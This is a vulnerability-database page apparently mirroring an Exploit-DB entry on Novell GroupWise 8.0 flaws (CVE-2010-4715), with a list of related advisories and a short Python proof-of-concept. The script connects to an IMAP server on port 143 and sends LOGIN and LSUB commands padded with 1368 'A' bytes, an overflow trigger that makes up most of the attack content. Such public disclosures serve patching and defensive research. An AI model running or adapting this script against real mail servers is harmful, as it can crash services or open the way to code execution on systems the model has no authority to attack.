Lucene search
+L

Novell Groupwise 8.0 - Multiple Remote Vulnerabilities

🗓️ 08 Nov 2010 00:00:00Reported by Francis ProvencherType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Novell Groupwise 8.0 - Multiple Remote Vulnerabilities including remote code-execution, information-disclosure, and cross-site scripting

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-4715
8 Nov 201000:00
circl
cve
CVE
CVE-2010-4715
31 Jan 201119:00
cve
cvelist
Cvelist
CVE-2010-4715
31 Jan 201119:00
cvelist
d2
d2
DSquare Exploit Pack: D2SEC_GWDVA
31 Jan 201120:00
d2
dsquare
Dsquare
Novell GroupWise 8 WebAccess File Disclosure
27 Apr 201200:00
dsquare
dsquare
Dsquare
Novell GroupWise 8 Document Viewer File Disclosure
27 Apr 201200:00
dsquare
euvd
EUVD
EUVD-2010-4680
7 Oct 202500:30
euvd
nessus
Tenable Nessus
Novell GroupWise Document Viewer Agent Arbitrary File Download
23 Nov 201000:00
nessus
nessus
Tenable Nessus
Novell GroupWise WebAccess Arbitrary File Download (local check)
23 Nov 201000:00
nessus
nessus
Tenable Nessus
Novell GroupWise WebAccess Arbitrary File Download
23 Nov 201000:00
nessus
Rows per page
source: https://www.securityfocus.com/bid/44732/info

Novell GroupWise is prone to multiple security vulnerabilities, including multiple remote code-execution vulnerabilities, an information-disclosure issue, and a cross-site scripting issue.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, obtain potentially sensitive information, or execute arbitrary code in the context of the user running the affected application. Information harvested may aid in further attacks; other attacks are also possible.

#!/usr/bin/python
#
# Francis Provencher for Protek Research Lab's.
#
#


import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = '\x41' * 1368

s.connect(('192.168.100.178',143))
s.recv(1024)
s.send('A001 LOGIN test  test ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 LSUB aa ' + buffer + '\r\n')
s.recv(1024)
s.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation